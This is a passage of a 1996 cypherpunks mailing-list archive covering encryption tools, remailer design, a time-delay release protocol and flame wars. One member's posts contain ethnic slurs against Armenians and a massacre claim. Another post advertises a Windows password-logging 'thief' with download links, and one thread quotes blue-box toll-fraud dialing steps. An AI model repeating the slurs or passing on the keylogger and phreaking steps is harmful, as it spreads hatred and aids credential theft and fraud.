the trust fund. Chapter 7 discusses issues of asset management. 

There are two mechanisms for offshore asset management. The simplest is a
straightforward asset management account, opened in an OECD country or a
tax haven. Most simple asset management accounts in OECD countries will be
liable to pay some tax on income earned; accounts in tax havens such as the
Channel Islands may therefore be more attractive. For example, an asset
management
agreement can be settled with an international bank in London for an
account held in the bank's Channel Island subsidiary. If this method is
unsuitable due to concerns of attachment, tax implications for the domestic
trust, or concerns of irrevocability of the assets, a two tier system might
be more appropriate. In a two-tier system, the domestic trust is a
tax-exempt entity and is the sole beneficiary of the offshore trust. The
offshore trust acts as the investment account and should also be tax exempt."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zierke@zierke.COM (Hans-Joachim Zierke)
Date: Tue, 22 Oct 1996 12:26:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: European Commission on "Illegal and harmful content on the Interne
In-Reply-To: <$m2n6813-.0NrZy4B4GDiQ089yn@iquest.com>
Message-ID: <6JN1ClQXI0B@zierke.COM>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Michael schrieb am 17.10.96:

> A recently released European Commission Communication on "Illegal
> and harmful content on the Internet" may prefigure the nature of
> coming European Union regulatory initiatives concerning the net.
> This Communication was in response to a 27 September resolution
> by the Telecommunication Council on "preventing the dissemination
> of illegal content on the Internet, in particular child
> pornography." The document


I did not find anything to decide WHO wrote that document for WHOM. 
Official press release? Paper by a pressure group? Whatever?

h.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQCVAwUBMm0yda1Qa39mIA0ZAQF9GgP/fu23PPKtPL6FYDfGNT3ChSQ9erJbuBGV
qWbhPSCrInv9ZZFLWELT5N2tRHgTMVpmmpwMz6zgiqz8Yhdrfv9WsqWV0Xyyj6zm
Vj6r/Krsc52OcYZG5HbOKc5e8iU9s9WruTV0+iAsDrUPYuAyP1dfEo2AR16IrmBQ
pg83RNpRzYs=
=1Sgc
-----END PGP SIGNATURE-----


-- 
    ====[Hans-Joachim Zierke]==============================================
        [Rathenower Str. 23 ]    Zierke@Zierke.COM
        [  D-10559 Berlin   ]             privat: hajo@quijote.in-berlin.de
    ====[  030 / 394 8447   ]==============================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 22 Oct 1996 18:31:01 -0700 (PDT)
To: Toly Tcymbal <nexus@public.ua.net>
Subject: Re: LC-1
In-Reply-To: <m0vFn40-000t4NC@clipper.cs.kiev.ua>
Message-ID: <Pine.SUN.3.94.961022212347.29900B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Oct 1996, Toly Tcymbal wrote:

> Did anyone hear about a device called LC-1? It is a voice encryption
> hardware that uses IDEA. I've found info about it on a Germany server. Tried
> to contact two guys that developed the thing and got no answer. One of the
> guys' names is Kurt (khuwig@cs.uni-sb.de) and the other one is Marko
> (maba@stud.uni-sb.de).
> 
> Any comments would be appreciated.

Look up Eric Blossom, who sells a nice piece of hardware which uses, as I
recall, 3DES.

> 
> TIA.
> 
> TT.
> 
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 22 Oct 1996 18:29:16 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: MD5?
Message-ID: <Pine.SUN.3.94.961022212709.29900D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



So...

Is MD5 essentially history?

Aside from MacPGP 2.6.3, is there a pgp version which will support
anything else?

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 22 Oct 1996 19:41:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [NOISE] Tim May's off-topic noise and personal attacks
In-Reply-To: <Pine.BSF.3.91.961022123550.15316B-100000@mcfeely.bsfs.org>
Message-ID: <P7a9VD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


cc:'d to John Gilmore.

Rabid Wombat <wombat@mcfeely.bsfs.org> writes:
> >
> > Timmy May is an ignorant coward. He's got nothing better to do,
> > so he starts up flame wars on this mailing list. He can't contribute
> > anything crypto-relevant because he knows nothing about cryptography.
>
> As I recall, he posted ONE piece of satire back in August. It was a

You "recall" wrong. There were about a dozen flames posted by Tim May
over the summer, attacking me for no apparent reason and attributing to
me various nonsense I never said. I replied to Tim off-list saying that
I never said anything resembling the stuff he ascribed to me, and that
if he has a problem with something he thinks I said in another forum, he
should address it in that forum, not cp. He never replied to me, but
kept on flaming me. I never responded to Tim's flames until I became
aware in September that he's been contacting various people not on the
c-punks list to complain about what I supposedly post to this list -
again, attributing to me nonsense I never said, not on this list, nor
elsewhere.

Your false "recollection" is based on a couple of lies Tim May posted to
this list: one claiming that he posted one "satire" and one claiming
that he disagreed with me over von Mises. To see that Tim lied (and that
you repeated his lies) just search the list archives and count the
number of times he viciously attacked me on this mailing list before I
responded.

> Sandy has made you a generous offer to come out to the west coast,
> expenses paid, and enlighten everyone with your knowledge of crypto.
> You seem to find all manner of excuses to avoid the trip, and are using
> his offer as a further opportunity to insult the list.

So far, I'm not convinced that this trip would be productive. I'll be
happy to discuss my work and cryptogrpahy in general and social
implication thereof with anyone. However it seems that Sandy et al
aren't capable of discussing any subject without flaming and gratuitous
insults.

> > This is a lie. Anyone who's been subscribed to this mailing list for
> > a while knows that Timmy May posts to most personal attacks (inlcuiding
> > attacks on his many enemies' religion and ethnicity), lies, fabricated
> > quotes, flame bait, and overall noise.
>
> Look in the mirror - attacks on religion, ethnicity, flame bait, NOISE ...

Fitting description of Tim May. Tim and his "supporters" have posted
dozens of flames to this mailing list about Russians, Cossacks (what do
I have to do with Cossacks???), Jews, etc, in a (failed) effort to
offend me. Search the archives for "Russian" and you'll see slurs like
"Don't tell our Russian what a petard is" or "Rude even by Russian
standards" not to mention a dozen claims that I can't speak English.

Tim May reminds me of one very stupid woman on Usenet who decided for
some reason that I must be Lithuanian and posted several diatribes on
how my supposed inbred Lithuanian heritage is somehow connected to my
genetic deficiencies. Tim May, flaming the Cossacks in an effort to
offend me, is as stupid and ignorant as most Americans.

On the other hand, Ray Arachelian is a typical product of the hate-
filled Armenian culture. Folks fortunate enough not to know many
Armenians don't realize that their self-identification is built upon the
hatred for Moslems, hatred for Jews, for their Georgian neighbors, and
generally everyone. Ray spouting off about "amoeba shit" sounds like a
typical hate-crazed Armenian, despite being in California.

Tim May posts more flame bait to this mailing list than anyone, mostly
in the form of personal attacks, or attacks on entire groups (like
mormons). Tim May attacked the mormons and started a flame war which I
help quench by asking people not to contribute anymore to that thread -
you lie when you accuse _me of what Tim May did.

> I, diseased nocturnal marsupial, pledge to post no more crap to this list
> in response to, or regarding, one Dimitri Vulis, KOTM.

I'm not bothered by the crap posted in response to what I post. For
example, I used to post "crypto-relevant wire clippings" to this list.
(I pretty much quit because no one seems to be interested in crypto here
anymore.) Certain friends of Tim tried to "defend" him by mailing back
to me multiple copies of the "wire clippings" with obscenities appended.
So, I finally took the time to figure out a way to filter them out.
These don't bother me.

If I see more unprovoked attacks on me on this mailing list from Tim May
or any of his "friends", I will respond and will point out that Tim May
is a liar. So far I have not started any flame wars on this list and all
of my responses were inferior in volume and viotriol to the originals.

If you want Tim May to continue attacking me on this list without being
hampered by my responses, you'll have to block me by technical means.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 22 Oct 1996 22:14:35 -0700 (PDT)
To: Declan McCullagh <declan@eff.org>
Subject: Re: Stopping the buying of candidates
Message-ID: <199610230514.WAA22084@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 PM 10/22/96 -0700, Declan McCullagh wrote:
>There would seem to be serious First Amendment problems with this scheme.

As there is with political donation restrictions generally.  I suppose the 
fig leaf they wrap around this is to buy the cooperation of the candidates 
by matching funds for those candidates who agree to restrictions.  Do the 
laws really prohibit the giving of more than a certain amount of money, or 
just the act of receiving it?  

>If you wanted to give or withhold support, you should able to say that 
>you did or didn't donate money.  Besides, interest groups would always be 
>able to telegraph the news of the donation -- while the public remains 
>in the dark. It may be better for the public to have full disclosure.
>-Declan

Sure, you can't keep people from talking.  However, one way to sabotage the 
usefulness of telling is to allow everybody else as well to make the same 
claim, with essentially no way for the candidates to tell who is REALLY 
giving the money.  Make the lie just as credible as the truth, and the value 
of knowing the truth is destroyed.  If nobody can trust anyone else's word, 
then no candidate could know who REALLY ought to be rewarded for a campaign 
contribution, breaking the circle of quid-pro-quo.  

The candidate still gets the money, of course, and the contributor is still 
free to both donate and speak...separately.  The thing that's been cut off 
is the association between the money and the speech...which is exactly what 
the problem is, isn't it?

I haven't thought this through well enough to know just how possible such a 
system might be, but this is exactly the kind of goal that cryptography and 
data-blinding functions can accomplish.  Frankly, I'd prefer a more 
effective (and more lethal) solution, but for all those who object to AP, 
here's my alternative plan.


>On Mon, 21 Oct 1996, jim bell wrote:
>
>> At 09:24 AM 10/17/96 -0800, Timothy C. May wrote:
>> >
>> >There are several swirling threads about the development of crypto systems
>> >(e.g., "binding cryptography," "key recovery," "one-way traceable e-cash")
>> >that are designed to allow law enforcement some ability to track illegal
>> >transactions, catch some criminals, etc.
>> 
>> One of the other items on my wish-list (short of a more, uh, "permanent" 
>> solution to politics) is a system to actually enforce the anonymity of 
>> political donations.  What I mean is this:  As bad as a large political 
>> contribution is, what's worse is that the candidate who receives it knows 
>> who it is from, and how large it is, etc.  Given the recent flap over the 
>> Indonesian donations to the DNC, it seems to me that it would actually clean 
>> up politics if there were a mechanism to collect donations, blind them and 
>> send them to the proper candidate, but hide the actual source of that money. 
>>  Hide it from the candidates, not necessarily the anyone else. 
>
>// declan@eff.org // I do not represent the EFF // declan@well.com //
>
>
>
>
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 22 Oct 1996 22:29:58 -0700 (PDT)
To: jsw@netscape.com
Subject: Re: PIS_son
Message-ID: <199610230529.WAA23151@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:11 PM 10/22/96 -0700, Jeff Weinstein wrote:
>John Young wrote:
>>    10-17-96, BuWi:
>>    "Apple, IBM, JavaSoft, Motorola, Netscape, Nortel, Novell,
>>    RSA, and Silicon Graphics Announce PICA Crypto-Alliance"
>>       The PICA specification will also be designed to make the
>>       task of developing differing domestic and exportable
>>       security requirements much easier. [GAK alliance 2.]
>
>  John, I think you are misreading the intent here.  By making
>it easier to develop separate domestic and exportable
>versions of a product, we foil the government's attempt to
>force weak domestic encryption because it is too much work to
>maintain two different versions.

What about making it easier to interconvert the domestic and exportable 
versions of the program?  Okay, I understand that given your position you 
might not want to come out on the record on this issue, but it seems to me 
that it would serve your interests to make it as easy as possible for a 
foreign buyer to convert a legally-exported copy of Netscape into an 
export-restricted one.

The default way for foreign buyers:  Buy Netscape from your Co., put it on 
the shelf, download illegally-exported version and use it.  Doable, 
obviously.  However, a more subtle way would be to add (or, for that matter, 
subtract) a portion of the program that controls whether or not 
export-quality encryption would "go."  

True, the "erase a file to enable good crypto" might not fly, but the 
opposite might.  I'm not talking about conventional "crypto with a hole," 
but simply a program which always contains crypto whose functioning is 
limited by an external program.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 22 Oct 1996 20:20:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: ANother Timmy May clone
In-Reply-To: <199610230038.UAA06783@caig1.att.att.com>
Message-ID: <DkD9VD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


stewarts@ix.netcom.com writes:
> This is the second time you've posted this.
> It's an amusing product, if you like snake-oil, and more people would
> have read your article if it didn't include gratuitous insults,
> especially in the title.
>
> At 07:30 PM 10/20/96 -0400, you wrote:
> >Timmy-May-style pseudo-crypto:
...

I'm responding to the list since others may noticed the same:

I did not post this article twice. I was surprised to see that it came
back from toad.com to me twice. Some glitch much have caused is to be
duplicated. Hasn't happened to any other articles... Sorry about that.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toly Tcymbal <nexus@public.ua.net>
Date: Tue, 22 Oct 1996 13:10:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: LC-1
Message-ID: <m0vFn40-000t4NC@clipper.cs.kiev.ua>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone hear about a device called LC-1? It is a voice encryption
hardware that uses IDEA. I've found info about it on a Germany server. Tried
to contact two guys that developed the thing and got no answer. One of the
guys' names is Kurt (khuwig@cs.uni-sb.de) and the other one is Marko
(maba@stud.uni-sb.de).

Any comments would be appreciated.

TIA.

TT.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 22 Oct 1996 20:51:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Timmy May is a jerk
In-Reply-To: <9610221756.AA26360@ibx.com>
Message-ID: <8oe9VD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


c62op27@ibx.com (Victor Fiorillo) writes:

> Ok, I'm a new subscriber.  I take it as a given that Timmy May is a jerk,
> but who is he?

I'm not sure if this is on-topic to this list, since Timmy May has
nothing to do with crypto... :-)

Basically, Timmy May is a retired senile old fart who used to work for Intel.
He's got nothing to do, he's bored, so he posts flame bait to this list.

Timmy is very stupid (can't think logically) and ignorant (doesn't know even
the things most educated Americans know). In particular, he's totally
ignorant of cryptography, which used to be the subject matter of this list.

Timmy likes to post personal attacks on people, attributing to them phoney
"quotes" that Timmy himself has made up. He's a proven liar.

He's also very racist. E.g., I happen to be Russian (have lived in the U.S.
for 17 years), so Timmy tries to insult me by flaming Russians in general
and writing some assinine drivel about the Cossacks (?????).

Recently Timmy posted an attack on mormons (having nothing to do with crypto)
and provoked a vicious religious flame war, which I helped quench by asking
people not to contribute to Timmy's thread anymore.

Clearly, Timmy has no life and his only remaining form of entertainment is
to read the flames that he provokes.

You can find more info on Timmy May and other jerks like him on the Web:

http://www.c2.org/~netscum/mayt0.html

I hope this helps.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bradley Ward Allen <ulmo@Q.Net>
Date: Tue, 22 Oct 1996 20:18:12 -0700 (PDT)
To: Fergus Henderson <fjh@cs.mu.oz.au>
Subject: Re: pgpmoose on q.net working; sorry; new issues. [moderation admin issue]
In-Reply-To: <199610220603.QAA05207@mundook.cs.mu.OZ.AU>
Message-ID: <199610230316.XAA23561@Q.Net>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 22 Oct 1996 22:51:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems [RANT
In-Reply-To: <326C5B77.650D@gte.net>
Message-ID: <7kg9VD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:

> Michael Peponis wrote:
> > :> > > Vulis, grow up.
> > That about sums it up.
> > It's one thing to  endlessly insult Tim May.  I can just ignore those.
> > It's another thing to send huge files full of irrevelent bable about
> > genocide in some third world country that I have to wait till it
> > downloads before I can make the determination that it's pure garbage.
> > (No, I don't killfile people on this list, maybe I should start)
>
> [snip]
>
> Gee, genocide everywhere. If you say the word often enough, it loses some of
> doesn't it?  How does it make you feel to know that you're here because your

It certainly rivals the Holocaust of 6M Jews during WW2. One important
difference is that Nazi Germans had specially built death camps with
trained personnel, while in 1905, 1914, and again in 1992, every Armenian
wanted to take part in the massacres.

> survived, probably because they were ruthless enough to trample on those less
> defend themselves.  Now I'm gonna catch hell for posting more noise, so all t
> now, let's stick our heads back in the sand.  It's not our responsibility, 'c
> all, we're just crypto people.

As I said, *I* don't see what relevance ethnic flames could possibly have
to a supposedly crypto-related mailing list, but Timmy May and his few friends
clearly disagree - witness their many rants about Russians and Cossacks (????)
as well as attacks on mormons. I also recall some clearly anti-Semetic rants
from Timmy May (something about Israel deserving to be nuked).

As for Ray, he's a typical hate-filled Armenian. Armenian heritage has been
defined for centuries in terms of "race-worship" and hatred for Moslems,
Jews, and anyone else non-Armenian. It's somewhat surprising to see such
stereotypical "old-country" behavior in an alleged Californian.

And I don't see any evidence that Timmy or Ray are "crypto people".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 22 Oct 1996 21:55:48 -0700 (PDT)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Timmy May is a jerk
In-Reply-To: <v03007801ae9324a698d5@[207.167.93.63]>
Message-ID: <199610230453.XAA02586@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Wait about a year or so, it will subside.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 23 Oct 1996 00:28:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Password Thief for Windows 95 (fwd)
Message-ID: <Pine.GUL.3.95.961023002458.5909A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


One of the more entertaining submissions to comp.os.ms-windows.announce.

Looks on topic to me, so it's approved....

He's also got "monitoring software" called "Mr. Burns." I love it.

-rich

---------- Forwarded message ----------
Date: 22 Oct 1996 17:13:27 GMT
From: Ed <emilczar@spherenet.com>
To: comp-os-ms-windows-announce@uunet.uu.net
Newsgroups: comp.os.ms-windows.announce
Subject: Password Thief for Windows 95

You can now find the Password Thief for Windows 95 on the
Internet.  This small utility sits around in your system
quitely logging all password that were typed.  This includes
login, screen saver, etc

http://ourworld.compuserve.com/homepages/esmsoftware/Thief.htm

http://ourworld.compuserve.com/homepages/esmsoftware/Thief100.zip

Ed





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: project_31@alias.cyberpass.net
Date: Wed, 23 Oct 1996 01:47:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Call for Discussion - Time-Delay Protocol
Message-ID: <199610230807.BAA14932@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


[Though I have posted this to the group four previous times, I have not
seen it - or any replies to it - in my incoming cypherpunks list
traffic.  If you have, sorry for the redundancy.  I need a replies to
this within the next week or it will be too late.  Thanks...]
%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%

I should be pleased to have informed input on this hypothetical problem:

                                    *

Very simply put, it is desired to put an encrypted, paragraph-length
message into ubiquitous public distribution, contained in an explanatory
plaintext.

On a predetermined date stated in the plaintext, the passphrase is to be
released and the parties holding the message may decrypt the cyphertext
and know its contents.

An undetermined number of persons and organizations would have a high
pecuniary and reputational interest in...

        1.  Knowing the contents of the encrypted message before the
            passphrase is publically released.

        2.  Counterfeiting both the explanatory message and enclosed
            cyphertext to include their own content, then placing the
            spoofed message into wide distribution as genuine, or
            flooding the net with multiple spoofs.

        3.  Discrediting the message by attacks on its protocol
            integrity in terms of date of release, modification after
            stated date of release and any other valid (or invalid)
            objections that may occur to them.

It is assumed that these persons and interests do not have access to
NSA-grade cryptanalysis, but may have access to academic-grade
cryptanalysis.

                                    *

At first glance, this seems to be a classic case for PGP using the
following protocol:

        1.  A large-modulus PGP public key is prepared prior to the
            experiment and placed on (a) the keyservers and (b) at an
            "authenticating" website of neutral interest and good
            reputation.

        2.  The critical message is encrypted conventionally (IDEA) in
            ASCII format with a large passphrase and included in the
            explanatory plaintext, which also includes the
            authenticating key ID hexnumber and fingerprint, and
            instructions on how to obtain the authenticating key.

        3.  The entire plaintext message is clearsigned with the
            authenticating public key, and the resulting textfile is
            widely distributed.

This permits the maximum number of persons with trivial interest to
easily decrypt the saved message by simple PGP use of the passphrase
released, and still provides for definitive authentication by those
troubling themselves to obtain the original public key.

                                   *

CALL FOR COMMENTS:

        1.  How may this protocol be improved?

        2.  What are the security flaws in this protocol?

        3.  May this protocol be simplified without compromising
            security?

Thanks to all who contribute.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 23 Oct 1996 01:14:00 -0700 (PDT)
To: Perry Farrell <pneyz@armory.com>
Subject: Re: Finally -- A crypto question from me...HD encryption
Message-ID: <199610230813.BAA16954@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 22 Oct 1996, Michael B Amoruso wrote:
>> Are there any good programs out there that can encrypt my HD??  Since
>> there probably are, please mention some and where I can get them.  Also,
>> no one mention PGP.

PGP works on files, not disks, and it's been talked about here pretty often :-)
The Secure Drive and Secure Device programs (secdrv and secdev) 
do disk encryption.  Some of the commercial products use single-DES,
so they're marginally useful if they don't implement things carelessly,
some use "Our really fast proprietary encryption" and are thus worthless.
Others just try to encrypt the FAT or other headers and therefore don't
stop Bad Guys from grepping through your disk for real data.
Your Macintosh mileage may vary.  For Unix-like systems there's CFS, Matt
Blaze's
Crypto File System.  

At 04:36 PM 10/22/96 -0700, Perry Farrell <pneyz@armory.com> wrote:
>Yes, the KOH disk encryption system. It is a small little thing that 
>encrypts the FAT (I believe) and nothing will work unless you know the 
Don't bother.  The KOH folks once talked about using virus techniques to spread
encryption that was good for you, and can therefore be presumed to be
terminally clueless.  If your description of KOH's disk encryption
strategy is correct, it's not really useful against professionals.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 23 Oct 1996 01:13:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Blue Box Plans & hacker bbs's
Message-ID: <199610230813.BAA16948@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


As Black Unicorn said, this is not alt.2600.

>> Oh yeah I forgot one thing.  What do you mean by NPA and why cant i just
>> dial like a regualr call??  And what is a DMTF dialer?
>> >Bell payphone (CoCoTs and USWest phones do not work) and dial
>> >"1+area+npa+number", like a normal call. Then play the tones. For a
>> >local call, dial "10288+area+npa+number", which makes AT&T think it's along
....
>NPA: Numbering Plan Area - known to us humans as area codes; instituted
>circa 1947 for long distance dialing.

Phone numbers in the US look like CountryCode-NPA-NXX-XXXX, where
CountryCode=1, NPA is the Numbering Plan Area, N is 2..9, and X is 0..9.
NPAs used to look like N0X or N1X, and exchange codes used to look like
NNX, and the not-very-powerful computers in old telephone switches
could tell a long-distance call from a local call by translating on the
first three digits.  Switches are smarter now, and the number space
is filling up, so exchange codes and NPA both look like NXX.

>Also - find as many back-issues of 2600 (a print publication) and Phrack
>(an on-line publication [text files]) as you possibly can.  Memorize
>them and you will be on your way to becoming a phone phreak!

Memorizing Stuff still leaves you a Clueless Newbie.  Learn Stuff.
Understand Stuff.  Do New Stuff.  (Not that memorizing hurts, of course...)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 23 Oct 1996 12:07:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [fwd] Implementing the anonymous.net domain
Message-ID: <199610230044.BAA00594@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



John Gilmore posted this on coderpunks, the response seems
underwhelming (only one response so far).  Looks interesting, and I
think a cool replacement for penet.  I'd be interested to see any
comments on practical implementations for this.

-Adam

Forwarded message:
======================================================================
To: coderpunks@toad.com
From: John Gilmore <gnu@toad.com>
Subject: Implementing the anonymous.net domain
Date: Sun, 20 Oct 1996 18:33:15 -0700

I'm looking for a project leader and a team who will take on the job
of making a working cryptographic "anonymous.net" domain.

I'm looking for software that would permit mail to be anonymized with
a return address like:

    lkjasdflkjaslkdjfhakjshdfokiuhasdouilkjasdflkjasdfkjl@anonymous.net

which would permit a reply to reach the originator by some secure
chain of remailers (I'm not interested in an implementation that
includes a Julf-like database).  This would require at least two
pieces of software:

	*  Something to anonymize mail and put in that return address
	*  Something to run on the anonymous.net server machines to
	   read the address, and remail the mail.

Additional subdomains can be allocated for other services, e.g.
web.anonymous.net, julfmail.anonymous.net, news.anonymous.net,
digicash.anonymous.net, etc.  These are particularly valuable when
multiple machines around the world can provide identical, replicated
service.

Current email and packet delivery protocols (A records and MX records)
permit us to offer a large set of potential machines to which
anonymous email would be delivered, at random, all under the same
domain name.  Each of these machines would have to be able to properly
route mail for any email address in the anonymous.net domain.  This
would avoid denial of service by shutting down any particular remailer
machine, as long as at least one advertised remailer remained up.  The
domain records themselves (for anonymous.net), which list the set of
advertised remailers, can also be replicated on numerous hosts to make
them harder to censor.

Having replicated, random entry point machines would also make it
harder to trace any specific message unless all the entry point
messages were tapped by an attacker.  The message they care about
might go through some entry point that wasn't tapped.

I'm willing to hold the domain name and defend it, but am too busy
to do any of the protocol design or technical work required.

The InterNIC has billed me for this domain; if we want it, it's time
for a team to step up and build it.  I'll pay the bill if I get a
team, else the domain will go away.  Have a discussion and let me
know.

Thanks,

	John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 23 Oct 1996 12:08:16 -0700 (PDT)
To: aba@dcs.ex.ac.uk
Subject: Re: [fwd] Implementing the anonymous.net domain
In-Reply-To: <199610230044.BAA00594@server.test.net>
Message-ID: <199610230050.BAA00601@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



John Gilmore <gnu@toad.com> writes:
> I'm looking for a project leader and a team who will take on the job
> of making a working cryptographic "anonymous.net" domain.
> 
> I'm looking for software that would permit mail to be anonymized with
> a return address like:
> 
>     lkjasdflkjaslkdjfhakjshdfokiuhasdouilkjasdflkjasdfkjl@anonymous.net

I like the idea of a more secure and resilient replacement for penet.

There are significant design problems to iron out if the result is to
provide good anonymity.

The implementation is tricky to do in a fashion which is secure, fault
tolerant, and scalable.  This would seem to be one of those "pick any
2" type problems where the design criteria conflict.  Perhaps we
should also add low bandwidth requirements for the user, resilience to
DoS (Denial of Service), and resilience to abuse by spammers.

>From the long email addres, were you thinking that the address itself
would contain the encrypted reply?  Encrypted reply blocks get big
even for a few hops, with PGP & type I remailers.

Chaining as a general method for creating reply blocks (such as the
alpha nymserver), is not that secure because a) it's using type I
remailers where messages with differing sizes show through, and b)
it's open to the replay, or flood attack.

Mixmaster has some nice improvements over type I remailers: fixed size
blocks, forward secrecy (not implemented yet), anti replay code.

However the anti-replay code means you can't use it directly for reply
blocks, and if you disabled that feature, you'd be open to the
flooding attack.

Combining mixmaster with message pools seems the most secure current
option.  This does have inconvenience in terms of the bandwidth
requirements of the user -- lots of people have got to download the
whole pool, or have unlogged local access to a newspool, or have a
broadcast newsfeed.  Also it reduces scalability, everyone gets all
messages.

> Additional subdomains can be allocated for other services, e.g.
> web.anonymous.net, julfmail.anonymous.net, news.anonymous.net,
> digicash.anonymous.net, etc.  These are particularly valuable when
> multiple machines around the world can provide identical, replicated
> service.

All nice things, but lets talk about one thing at a time,
anonymous.net email addresses first!

> Current email and packet delivery protocols (A records and MX records)
> permit us to offer a large set of potential machines to which
> anonymous email would be delivered, at random, all under the same
> domain name.  

OK, so you could use multiple DNS entries to pick a machine at
random...

> Each of these machines would have to be able to properly route mail
> for any email address in the anonymous.net domain.  This would avoid
> denial of service by shutting down any particular remailer machine,
> as long as at least one advertised remailer remained up.  

This level of resilience seems to imply that there is only one
remailer key, and that each remailer could decrypt all the remailer
traffic.  This would be as trustworthy as the least trustworthy
remailer.  (That will be the one owned by the NSA front).  Very
resilient but not very secure.

Perhaps you mean instead that the anonymous.net domain replicators do
not do remailing as such, they just provide the anonymous.net address,
and route the message to the appropriate remailer.  If you mean this,
then you have lots of protection for the forwarders, and as long as
one is left your mail gets forwarded to the correct remailer.  However
you still have problems of resilience of the actual remailers, if any
remailer on your chain breaks, so does youre reply block.

You could trade off security for resilience by having multiple reply
blocks.

Another approach may be to secret share a single group remailer
private key.  Have a threshold of remailers needed to decrypt.  Each
remailer part decrypts, and passes on to another remailer, eventually
the remail instruction is decrypted, and the message is sent to the
